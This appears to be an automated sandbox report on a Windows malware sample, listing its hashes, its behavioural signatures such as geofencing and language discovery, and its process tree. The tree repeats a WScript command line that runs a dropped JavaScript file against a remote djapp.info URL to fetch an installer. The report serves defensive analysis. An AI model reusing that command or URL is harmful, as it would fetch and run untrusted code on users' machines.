Analysis
-
max time kernel
135s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
25/09/2024, 20:57
General
-
Target
f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe
-
Size
184KB
-
MD5
f6d885fd766bea14a67d5302ca3d258f
-
SHA1
044e4aa23ea461d70f73bd9bcd5365d0c9ded3f8
-
SHA256
5a531abdbc9327c04035951f175682d0272c0c62f484b8adb7e0c8fc97fe397b
-
SHA512
0d7ed97b9c05cff41fc81597a4cd932e1d2e3c8ee0a9d8108fafb7d43448e46d2db52558f87091832048a90c1d11085f6eaa1161cd220b7568f32c8c5d903cf2
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3l:/7BSH8zUB+nGESaaRvoB7FJNndns
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 1 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\f6d885fd766bea14a67d5302ca3d258f_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAFD7.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAFD7.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAFD7.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAFD7.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAFD7.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAFD7.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAFD7.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAFD7.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAFD7.js" http://www.djapp.info/?domain=XCBoCmjxJa.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAFD7.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76